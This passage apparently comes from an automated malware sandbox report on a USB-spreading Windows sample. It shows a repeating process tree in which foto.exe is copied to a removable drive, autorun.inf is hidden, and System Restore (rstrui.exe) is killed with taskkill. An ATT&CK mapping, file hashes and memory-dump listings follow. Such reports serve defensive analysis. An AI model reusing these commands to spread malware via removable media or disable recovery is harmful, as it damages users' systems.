    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:488
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:560
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:284
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2800
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1496
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:448
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:988
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1512
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2020
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:588
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:612
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2040
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2372
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2012
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:884
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2084
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2044
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1088
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:3008
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1312
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2036
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1780
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:348
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1864
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2424
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2456
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1956
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2500
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2316
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2236
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:880
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2204
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:912
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2696
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:768
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2196
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1572
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1716
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2192
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2440
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2720
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1004
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2804
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2724
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2816
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2896
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2768
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2888
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2620
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2908
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2232
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2176
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1052
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2900
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2152
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2656
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:840
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2248
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1028
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1952
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2872
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2964
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2988
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2708
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2600
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2856
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1228
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2836
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2976
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2368
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2680
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2576
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1640
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2672
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1872
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:1576
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2144
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2052
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1916
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1760
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:2064
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2140
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:488
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1376
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1484
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:1208
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:3036
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    - Sets file to hidden
    PID:2996
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:1772
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:108
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:2472
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1104
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    PID:284
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe F:\
    3⤵
    PID:2200
- - C:\Windows\SysWOW64\xcopy.exe
    xcopy /h/c/q/y C:\Windows\system32\foto.exe "F:\\fotos camara\"
    3⤵
    PID:1132
- - C:\Windows\SysWOW64\attrib.exe
    attrib -A +H +S +R F:\autorun.inf
    3⤵
    PID:1900
- - C:\Windows\SysWOW64\taskkill.exe
    taskkill /f /im "rstrui.exe"
    3⤵
    - Kills process with taskkill
    PID:2028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\SysWOW64\windows_update.bat

Filesize
1KB

MD5
bc4a82e294f1ef73ebf54d8cbff10e1f

SHA1
c8a0d9522ef20d16e9f4f23bad004b2ee49f600e

SHA256
5556c225c15254fb8209479757dfd680a3b8f9dd97554777e8a63ad8718fee6d

SHA512
1d0857fea9ca525196a3f9ba46eefa88d75b9f036ba5322e08426d595e3ee18511656cd37d885c9bca95288aacd8d1d8391d47c2b34c1e9e66d7d201ec6da897

Download Submit
F:\autorun.inf

Filesize
119B

MD5
cd5420c9932b95d7511ecbddf14ae6c7

SHA1
01fc0690cea6eda07b36f07360a9bbd010ece61d

SHA256
a80abb5d332141c06617529eac78fe3da275d986c7a968b3bb5d045f4ca9e03c

SHA512
c7f0545816f67a191b16b03e7fda5a0952a4366ae5284796625c0e133f07c92cae69dcee1fe2a0ce06a529899db74e70674f3a236e4d675d0a048e069a4bc210

Download Submit
memory/1700-13-0x0000000077100000-0x00000000771FA000-memory.dmp

Filesize
1000KB

Download
memory/1700-35-0x0000000077100000-0x00000000771FA000-memory.dmp

Filesize
1000KB

Download
memory/1700-34-0x0000000077200000-0x000000007731F000-memory.dmp

Filesize
1.1MB

Download
memory/1700-40-0x0000000077200000-0x000000007731F000-memory.dmp

Filesize
1.1MB

Download
memory/1700-41-0x0000000077100000-0x00000000771FA000-memory.dmp

Filesize
1000KB

Download
memory/1700-45-0x0000000077100000-0x00000000771FA000-memory.dmp

Filesize
1000KB

Download
memory/1700-44-0x0000000077200000-0x000000007731F000-memory.dmp

Filesize
1.1MB

Download
memory/2184-0-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download
memory/2184-11-0x0000000000400000-0x000000000041C000-memory.dmp

Filesize
112KB

Download